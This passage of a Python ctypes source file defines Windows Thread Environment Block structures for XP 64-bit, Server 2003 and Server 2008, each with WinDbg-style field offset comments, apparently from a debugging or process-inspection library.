("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", UCHAR * 24),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", DWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorsAreDisabled", DWORD),
("Instrumentation", PVOID * 16),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("InDbgPrint", BOOLEAN),
("FreeStackOnTermination", BOOLEAN),
("HasFiberData", BOOLEAN),
("IdealProcessor", UCHAR),
("Spare3", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("Wx86Thread", Wx86ThreadState),
("TlsExpansionSlots", PVOID), # Ptr32 Ptr32 Void
("ImpersonationLocale", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("SafeThunkCall", BOOLEAN),
("BooleanSpare", BOOLEAN * 3),
]
# +0x000 NtTib : _NT_TIB
# +0x038 EnvironmentPointer : Ptr64 Void
# +0x040 ClientId : _CLIENT_ID
# +0x050 ActiveRpcHandle : Ptr64 Void
# +0x058 ThreadLocalStoragePointer : Ptr64 Void
# +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
# +0x068 LastErrorValue : Uint4B
# +0x06c CountOfOwnedCriticalSections : Uint4B
# +0x070 CsrClientThread : Ptr64 Void
# +0x078 Win32ThreadInfo : Ptr64 Void
# +0x080 User32Reserved : [26] Uint4B
# +0x0e8 UserReserved : [5] Uint4B
# +0x100 WOW32Reserved : Ptr64 Void
# +0x108 CurrentLocale : Uint4B
# +0x10c FpSoftwareStatusRegister : Uint4B
# +0x110 SystemReserved1 : [54] Ptr64 Void
# +0x2c0 ExceptionCode : Int4B
# +0x2c8 ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK
# +0x2d0 SpareBytes1 : [28] UChar
# +0x2f0 GdiTebBatch : _GDI_TEB_BATCH
# +0x7d8 RealClientId : _CLIENT_ID
# +0x7e8 GdiCachedProcessHandle : Ptr64 Void
# +0x7f0 GdiClientPID : Uint4B
# +0x7f4 GdiClientTID : Uint4B
# +0x7f8 GdiThreadLocalInfo : Ptr64 Void
# +0x800 Win32ClientInfo : [62] Uint8B
# +0x9f0 glDispatchTable : [233] Ptr64 Void
# +0x1138 glReserved1 : [29] Uint8B
# +0x1220 glReserved2 : Ptr64 Void
# +0x1228 glSectionInfo : Ptr64 Void
# +0x1230 glSection : Ptr64 Void
# +0x1238 glTable : Ptr64 Void
# +0x1240 glCurrentRC : Ptr64 Void
# +0x1248 glContext : Ptr64 Void
# +0x1250 LastStatusValue : Uint4B
# +0x1258 StaticUnicodeString : _UNICODE_STRING
# +0x1268 StaticUnicodeBuffer : [261] Uint2B
# +0x1478 DeallocationStack : Ptr64 Void
# +0x1480 TlsSlots : [64] Ptr64 Void
# +0x1680 TlsLinks : _LIST_ENTRY
# +0x1690 Vdm : Ptr64 Void
# +0x1698 ReservedForNtRpc : Ptr64 Void
# +0x16a0 DbgSsReserved : [2] Ptr64 Void
# +0x16b0 HardErrorMode : Uint4B
# +0x16b8 Instrumentation : [14] Ptr64 Void
# +0x1728 SubProcessTag : Ptr64 Void
# +0x1730 EtwTraceData : Ptr64 Void
# +0x1738 WinSockData : Ptr64 Void
# +0x1740 GdiBatchCount : Uint4B
# +0x1744 InDbgPrint : UChar
# +0x1745 FreeStackOnTermination : UChar
# +0x1746 HasFiberData : UChar
# +0x1747 IdealProcessor : UChar
# +0x1748 GuaranteedStackBytes : Uint4B
# +0x1750 ReservedForPerf : Ptr64 Void
# +0x1758 ReservedForOle : Ptr64 Void
# +0x1760 WaitingOnLoaderLock : Uint4B
# +0x1768 SparePointer1 : Uint8B
# +0x1770 SoftPatchPtr1 : Uint8B
# +0x1778 SoftPatchPtr2 : Uint8B
# +0x1780 TlsExpansionSlots : Ptr64 Ptr64 Void
# +0x1788 DeallocationBStore : Ptr64 Void
# +0x1790 BStoreLimit : Ptr64 Void
# +0x1798 ImpersonationLocale : Uint4B
# +0x179c IsImpersonating : Uint4B
# +0x17a0 NlsCache : Ptr64 Void
# +0x17a8 pShimData : Ptr64 Void
# +0x17b0 HeapVirtualAffinity : Uint4B
# +0x17b8 CurrentTransactionHandle : Ptr64 Void
# +0x17c0 ActiveFrame : Ptr64 _TEB_ACTIVE_FRAME
# +0x17c8 FlsData : Ptr64 Void
# +0x17d0 SafeThunkCall : UChar
# +0x17d1 BooleanSpare : [3] UChar
class _TEB_XP_64(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", PVOID),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", UCHAR * 28),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", QWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", QWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 14),
("SubProcessTag", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("InDbgPrint", BOOLEAN),
("FreeStackOnTermination", BOOLEAN),
("HasFiberData", BOOLEAN),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SparePointer1", PVOID),
("SoftPatchPtr1", PVOID),
("SoftPatchPtr2", PVOID),
("TlsExpansionSlots", PVOID), # Ptr64 Ptr64 Void
("DeallocationBStore", PVOID),
("BStoreLimit", PVOID),
("ImpersonationLocale", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("SafeThunkCall", BOOLEAN),
("BooleanSpare", BOOLEAN * 3),
]
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStackPointer : Ptr32 _ACTIVATION_CONTEXT_STACK
# +0x1ac SpareBytes1 : [40] UChar
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Uint2B
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorMode : Uint4B
# +0xf2c Instrumentation : [14] Ptr32 Void
# +0xf64 SubProcessTag : Ptr32 Void
# +0xf68 EtwTraceData : Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 InDbgPrint : UChar
# +0xf75 FreeStackOnTermination : UChar
# +0xf76 HasFiberData : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 GuaranteedStackBytes : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 SparePointer1 : Uint4B
# +0xf8c SoftPatchPtr1 : Uint4B
# +0xf90 SoftPatchPtr2 : Uint4B
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 ImpersonationLocale : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 FlsData : Ptr32 Void
# +0xfb8 SafeThunkCall : UChar
# +0xfb9 BooleanSpare : [3] UChar
class _TEB_2003(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", UCHAR * 40),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", DWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 14),
("SubProcessTag", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("InDbgPrint", BOOLEAN),
("FreeStackOnTermination", BOOLEAN),
("HasFiberData", BOOLEAN),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SparePointer1", PVOID),
("SoftPatchPtr1", PVOID),
("SoftPatchPtr2", PVOID),
("TlsExpansionSlots", PVOID), # Ptr32 Ptr32 Void
("ImpersonationLocale", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("SafeThunkCall", BOOLEAN),
("BooleanSpare", BOOLEAN * 3),
]
_TEB_2003_64 = _TEB_XP_64
_TEB_2003_R2 = _TEB_2003
_TEB_2003_R2_64 = _TEB_2003_64
# +0x000 NtTib : _NT_TIB
# +0x01c EnvironmentPointer : Ptr32 Void
# +0x020 ClientId : _CLIENT_ID
# +0x028 ActiveRpcHandle : Ptr32 Void
# +0x02c ThreadLocalStoragePointer : Ptr32 Void
# +0x030 ProcessEnvironmentBlock : Ptr32 _PEB
# +0x034 LastErrorValue : Uint4B
# +0x038 CountOfOwnedCriticalSections : Uint4B
# +0x03c CsrClientThread : Ptr32 Void
# +0x040 Win32ThreadInfo : Ptr32 Void
# +0x044 User32Reserved : [26] Uint4B
# +0x0ac UserReserved : [5] Uint4B
# +0x0c0 WOW32Reserved : Ptr32 Void
# +0x0c4 CurrentLocale : Uint4B
# +0x0c8 FpSoftwareStatusRegister : Uint4B
# +0x0cc SystemReserved1 : [54] Ptr32 Void
# +0x1a4 ExceptionCode : Int4B
# +0x1a8 ActivationContextStackPointer : Ptr32 _ACTIVATION_CONTEXT_STACK
# +0x1ac SpareBytes1 : [36] UChar
# +0x1d0 TxFsContext : Uint4B
# +0x1d4 GdiTebBatch : _GDI_TEB_BATCH
# +0x6b4 RealClientId : _CLIENT_ID
# +0x6bc GdiCachedProcessHandle : Ptr32 Void
# +0x6c0 GdiClientPID : Uint4B
# +0x6c4 GdiClientTID : Uint4B
# +0x6c8 GdiThreadLocalInfo : Ptr32 Void
# +0x6cc Win32ClientInfo : [62] Uint4B
# +0x7c4 glDispatchTable : [233] Ptr32 Void
# +0xb68 glReserved1 : [29] Uint4B
# +0xbdc glReserved2 : Ptr32 Void
# +0xbe0 glSectionInfo : Ptr32 Void
# +0xbe4 glSection : Ptr32 Void
# +0xbe8 glTable : Ptr32 Void
# +0xbec glCurrentRC : Ptr32 Void
# +0xbf0 glContext : Ptr32 Void
# +0xbf4 LastStatusValue : Uint4B
# +0xbf8 StaticUnicodeString : _UNICODE_STRING
# +0xc00 StaticUnicodeBuffer : [261] Wchar
# +0xe0c DeallocationStack : Ptr32 Void
# +0xe10 TlsSlots : [64] Ptr32 Void
# +0xf10 TlsLinks : _LIST_ENTRY
# +0xf18 Vdm : Ptr32 Void
# +0xf1c ReservedForNtRpc : Ptr32 Void
# +0xf20 DbgSsReserved : [2] Ptr32 Void
# +0xf28 HardErrorMode : Uint4B
# +0xf2c Instrumentation : [9] Ptr32 Void
# +0xf50 ActivityId : _GUID
# +0xf60 SubProcessTag : Ptr32 Void
# +0xf64 EtwLocalData : Ptr32 Void
# +0xf68 EtwTraceData : Ptr32 Void
# +0xf6c WinSockData : Ptr32 Void
# +0xf70 GdiBatchCount : Uint4B
# +0xf74 SpareBool0 : UChar
# +0xf75 SpareBool1 : UChar
# +0xf76 SpareBool2 : UChar
# +0xf77 IdealProcessor : UChar
# +0xf78 GuaranteedStackBytes : Uint4B
# +0xf7c ReservedForPerf : Ptr32 Void
# +0xf80 ReservedForOle : Ptr32 Void
# +0xf84 WaitingOnLoaderLock : Uint4B
# +0xf88 SavedPriorityState : Ptr32 Void
# +0xf8c SoftPatchPtr1 : Uint4B
# +0xf90 ThreadPoolData : Ptr32 Void
# +0xf94 TlsExpansionSlots : Ptr32 Ptr32 Void
# +0xf98 ImpersonationLocale : Uint4B
# +0xf9c IsImpersonating : Uint4B
# +0xfa0 NlsCache : Ptr32 Void
# +0xfa4 pShimData : Ptr32 Void
# +0xfa8 HeapVirtualAffinity : Uint4B
# +0xfac CurrentTransactionHandle : Ptr32 Void
# +0xfb0 ActiveFrame : Ptr32 _TEB_ACTIVE_FRAME
# +0xfb4 FlsData : Ptr32 Void
# +0xfb8 PreferredLanguages : Ptr32 Void
# +0xfbc UserPrefLanguages : Ptr32 Void
# +0xfc0 MergedPrefLanguages : Ptr32 Void
# +0xfc4 MuiImpersonation : Uint4B
# +0xfc8 CrossTebFlags : Uint2B
# +0xfc8 SpareCrossTebBits : Pos 0, 16 Bits
# +0xfca SameTebFlags : Uint2B
# +0xfca DbgSafeThunkCall : Pos 0, 1 Bit
# +0xfca DbgInDebugPrint : Pos 1, 1 Bit
# +0xfca DbgHasFiberData : Pos 2, 1 Bit
# +0xfca DbgSkipThreadAttach : Pos 3, 1 Bit
# +0xfca DbgWerInShipAssertCode : Pos 4, 1 Bit
# +0xfca DbgRanProcessInit : Pos 5, 1 Bit
# +0xfca DbgClonedThread : Pos 6, 1 Bit
# +0xfca DbgSuppressDebugMsg : Pos 7, 1 Bit
# +0xfca RtlDisableUserStackWalk : Pos 8, 1 Bit
# +0xfca RtlExceptionAttached : Pos 9, 1 Bit
# +0xfca SpareSameTebBits : Pos 10, 6 Bits
# +0xfcc TxnScopeEnterCallback : Ptr32 Void
# +0xfd0 TxnScopeExitCallback : Ptr32 Void
# +0xfd4 TxnScopeContext : Ptr32 Void
# +0xfd8 LockCount : Uint4B
# +0xfdc ProcessRundown : Uint4B
# +0xfe0 LastSwitchTime : Uint8B
# +0xfe8 TotalSwitchOutTime : Uint8B
# +0xff0 WaitReasonBitMap : _LARGE_INTEGER
class _TEB_2008(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", UCHAR * 36),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", DWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", DWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 9),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("SpareBool0", BOOLEAN),
("SpareBool1", BOOLEAN),
("SpareBool2", BOOLEAN),
("IdealProcessor", UCHAR),
("GuaranteedStackBytes", DWORD),
("ReservedForPerf", PVOID),
("ReservedForOle", PVOID),
("WaitingOnLoaderLock", DWORD),
("SavedPriorityState", PVOID),
("SoftPatchPtr1", PVOID),
("ThreadPoolData", PVOID),
("TlsExpansionSlots", PVOID), # Ptr32 Ptr32 Void
("ImpersonationLocale", DWORD),
("IsImpersonating", BOOL),
("NlsCache", PVOID),
("pShimData", PVOID),
("HeapVirtualAffinity", DWORD),
("CurrentTransactionHandle", HANDLE),
("ActiveFrame", PVOID), # PTEB_ACTIVE_FRAME
("FlsData", PVOID),
("PreferredLanguages", PVOID),
("UserPrefLanguages", PVOID),
("MergedPrefLanguages", PVOID),
("MuiImpersonation", BOOL),
("CrossTebFlags", WORD),
("SameTebFlags", WORD),
("TxnScopeEnterCallback", PVOID),
("TxnScopeExitCallback", PVOID),
("TxnScopeContext", PVOID),
("LockCount", DWORD),
("ProcessRundown", DWORD),
("LastSwitchTime", QWORD),
("TotalSwitchOutTime", QWORD),
("WaitReasonBitMap", LONGLONG), # LARGE_INTEGER
]
# +0x000 NtTib : _NT_TIB
# +0x038 EnvironmentPointer : Ptr64 Void
# +0x040 ClientId : _CLIENT_ID
# +0x050 ActiveRpcHandle : Ptr64 Void
# +0x058 ThreadLocalStoragePointer : Ptr64 Void
# +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
# +0x068 LastErrorValue : Uint4B
# +0x06c CountOfOwnedCriticalSections : Uint4B
# +0x070 CsrClientThread : Ptr64 Void
# +0x078 Win32ThreadInfo : Ptr64 Void
# +0x080 User32Reserved : [26] Uint4B
# +0x0e8 UserReserved : [5] Uint4B
# +0x100 WOW32Reserved : Ptr64 Void
# +0x108 CurrentLocale : Uint4B
# +0x10c FpSoftwareStatusRegister : Uint4B
# +0x110 SystemReserved1 : [54] Ptr64 Void
# +0x2c0 ExceptionCode : Int4B
# +0x2c8 ActivationContextStackPointer : Ptr64 _ACTIVATION_CONTEXT_STACK
# +0x2d0 SpareBytes1 : [24] UChar
# +0x2e8 TxFsContext : Uint4B
# +0x2f0 GdiTebBatch : _GDI_TEB_BATCH
# +0x7d8 RealClientId : _CLIENT_ID
# +0x7e8 GdiCachedProcessHandle : Ptr64 Void
# +0x7f0 GdiClientPID : Uint4B
# +0x7f4 GdiClientTID : Uint4B
# +0x7f8 GdiThreadLocalInfo : Ptr64 Void
# +0x800 Win32ClientInfo : [62] Uint8B
# +0x9f0 glDispatchTable : [233] Ptr64 Void
# +0x1138 glReserved1 : [29] Uint8B
# +0x1220 glReserved2 : Ptr64 Void
# +0x1228 glSectionInfo : Ptr64 Void
# +0x1230 glSection : Ptr64 Void
# +0x1238 glTable : Ptr64 Void
# +0x1240 glCurrentRC : Ptr64 Void
# +0x1248 glContext : Ptr64 Void
# +0x1250 LastStatusValue : Uint4B
# +0x1258 StaticUnicodeString : _UNICODE_STRING
# +0x1268 StaticUnicodeBuffer : [261] Wchar
# +0x1478 DeallocationStack : Ptr64 Void
# +0x1480 TlsSlots : [64] Ptr64 Void
# +0x1680 TlsLinks : _LIST_ENTRY
# +0x1690 Vdm : Ptr64 Void
# +0x1698 ReservedForNtRpc : Ptr64 Void
# +0x16a0 DbgSsReserved : [2] Ptr64 Void
# +0x16b0 HardErrorMode : Uint4B
# +0x16b8 Instrumentation : [11] Ptr64 Void
# +0x1710 ActivityId : _GUID
# +0x1720 SubProcessTag : Ptr64 Void
# +0x1728 EtwLocalData : Ptr64 Void
# +0x1730 EtwTraceData : Ptr64 Void
# +0x1738 WinSockData : Ptr64 Void
# +0x1740 GdiBatchCount : Uint4B
# +0x1744 SpareBool0 : UChar
# +0x1745 SpareBool1 : UChar
# +0x1746 SpareBool2 : UChar
# +0x1747 IdealProcessor : UChar
# +0x1748 GuaranteedStackBytes : Uint4B
# +0x1750 ReservedForPerf : Ptr64 Void
# +0x1758 ReservedForOle : Ptr64 Void
# +0x1760 WaitingOnLoaderLock : Uint4B
# +0x1768 SavedPriorityState : Ptr64 Void
# +0x1770 SoftPatchPtr1 : Uint8B
# +0x1778 ThreadPoolData : Ptr64 Void
# +0x1780 TlsExpansionSlots : Ptr64 Ptr64 Void
# +0x1788 DeallocationBStore : Ptr64 Void
# +0x1790 BStoreLimit : Ptr64 Void
# +0x1798 ImpersonationLocale : Uint4B
# +0x179c IsImpersonating : Uint4B
# +0x17a0 NlsCache : Ptr64 Void
# +0x17a8 pShimData : Ptr64 Void
# +0x17b0 HeapVirtualAffinity : Uint4B
# +0x17b8 CurrentTransactionHandle : Ptr64 Void
# +0x17c0 ActiveFrame : Ptr64 _TEB_ACTIVE_FRAME
# +0x17c8 FlsData : Ptr64 Void
# +0x17d0 PreferredLanguages : Ptr64 Void
# +0x17d8 UserPrefLanguages : Ptr64 Void
# +0x17e0 MergedPrefLanguages : Ptr64 Void
# +0x17e8 MuiImpersonation : Uint4B
# +0x17ec CrossTebFlags : Uint2B
# +0x17ec SpareCrossTebBits : Pos 0, 16 Bits
# +0x17ee SameTebFlags : Uint2B
# +0x17ee DbgSafeThunkCall : Pos 0, 1 Bit
# +0x17ee DbgInDebugPrint : Pos 1, 1 Bit
# +0x17ee DbgHasFiberData : Pos 2, 1 Bit
# +0x17ee DbgSkipThreadAttach : Pos 3, 1 Bit
# +0x17ee DbgWerInShipAssertCode : Pos 4, 1 Bit
# +0x17ee DbgRanProcessInit : Pos 5, 1 Bit
# +0x17ee DbgClonedThread : Pos 6, 1 Bit
# +0x17ee DbgSuppressDebugMsg : Pos 7, 1 Bit
# +0x17ee RtlDisableUserStackWalk : Pos 8, 1 Bit
# +0x17ee RtlExceptionAttached : Pos 9, 1 Bit
# +0x17ee SpareSameTebBits : Pos 10, 6 Bits
# +0x17f0 TxnScopeEnterCallback : Ptr64 Void
# +0x17f8 TxnScopeExitCallback : Ptr64 Void
# +0x1800 TxnScopeContext : Ptr64 Void
# +0x1808 LockCount : Uint4B
# +0x180c ProcessRundown : Uint4B
# +0x1810 LastSwitchTime : Uint8B
# +0x1818 TotalSwitchOutTime : Uint8B
# +0x1820 WaitReasonBitMap : _LARGE_INTEGER
class _TEB_2008_64(Structure):
_pack_ = 8
_fields_ = [
("NtTib", NT_TIB),
("EnvironmentPointer", PVOID),
("ClientId", CLIENT_ID),
("ActiveRpcHandle", HANDLE),
("ThreadLocalStoragePointer", PVOID),
("ProcessEnvironmentBlock", PVOID), # PPEB
("LastErrorValue", DWORD),
("CountOfOwnedCriticalSections", DWORD),
("CsrClientThread", PVOID),
("Win32ThreadInfo", PVOID),
("User32Reserved", DWORD * 26),
("UserReserved", DWORD * 5),
("WOW32Reserved", PVOID), # ptr to wow64cpu!X86SwitchTo64BitMode
("CurrentLocale", DWORD),
("FpSoftwareStatusRegister", DWORD),
("SystemReserved1", PVOID * 54),
("ExceptionCode", SDWORD),
("ActivationContextStackPointer", PVOID), # PACTIVATION_CONTEXT_STACK
("SpareBytes1", UCHAR * 24),
("TxFsContext", DWORD),
("GdiTebBatch", GDI_TEB_BATCH),
("RealClientId", CLIENT_ID),
("GdiCachedProcessHandle", HANDLE),
("GdiClientPID", DWORD),
("GdiClientTID", DWORD),
("GdiThreadLocalInfo", PVOID),
("Win32ClientInfo", QWORD * 62),
("glDispatchTable", PVOID * 233),
("glReserved1", QWORD * 29),
("glReserved2", PVOID),
("glSectionInfo", PVOID),
("glSection", PVOID),
("glTable", PVOID),
("glCurrentRC", PVOID),
("glContext", PVOID),
("LastStatusValue", NTSTATUS),
("StaticUnicodeString", UNICODE_STRING),
("StaticUnicodeBuffer", WCHAR * 261),
("DeallocationStack", PVOID),
("TlsSlots", PVOID * 64),
("TlsLinks", LIST_ENTRY),
("Vdm", PVOID),
("ReservedForNtRpc", PVOID),
("DbgSsReserved", PVOID * 2),
("HardErrorMode", DWORD),
("Instrumentation", PVOID * 11),
("ActivityId", GUID),
("SubProcessTag", PVOID),
("EtwLocalData", PVOID),
("EtwTraceData", PVOID),
("WinSockData", PVOID),
("GdiBatchCount", DWORD),
("SpareBool0", BOOLEAN),
